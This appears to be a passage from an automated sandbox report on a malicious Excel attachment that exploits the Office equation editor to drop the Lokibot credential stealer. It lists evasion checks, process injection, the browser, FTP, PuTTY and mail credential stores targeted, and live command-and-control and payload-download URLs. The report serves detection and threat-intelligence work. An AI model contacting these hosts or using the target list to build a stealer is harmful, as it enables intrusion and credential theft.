Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h] 5_2_0040317B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap, 5_2_00402B7C
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 5_2_00406069 GetUserNameW, 5_2_00406069
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Lokibot
Source: Yara match File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Users\Public\vbc.exe Code function: PopPassword 5_2_0040D069
Source: C:\Users\Public\vbc.exe Code function: SmtpPassword 5_2_0040D069
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 435330 Sample: Shipping-Documents.xlsx Startdate: 16/06/2021 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->31 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 14 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 38 34 2->12         started        process3 dnsIp4 29 103.89.90.94, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 7->29 21 C:\Users\user\AppData\Local\...\regasm[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        25 C:\Users\user\...\~$Shipping-Documents.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Multi AV Scanner detection for dropped file 14->49 51 Tries to steal Mail credentials (via file registry) 14->51 53 Injects a PE file into a foreign processes 14->53 17 vbc.exe 54 14->17         started        process9 dnsIp10 27 63.141.228.141, 49168, 49169, 49170 NOCIXUS United States 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.89.90.94
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true
63.141.228.141
 unknown United States
33387 NOCIXUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://103.89.90.94/pzldoc/regasm.exe true
  • Avira URL Cloud: safe
 unknown
http://kbfvzoboss.bid/alien/fre.php true
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
 unknown
http://alphastand.top/alien/fre.php true
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
 unknown
http://63.141.228.141/32.php/S4wFP8QBww9Tp true
  • Avira URL Cloud: safe
 unknown
http://alphastand.win/alien/fre.php true
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
 unknown
http://alphastand.trade/alien/fre.php true
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
 unknown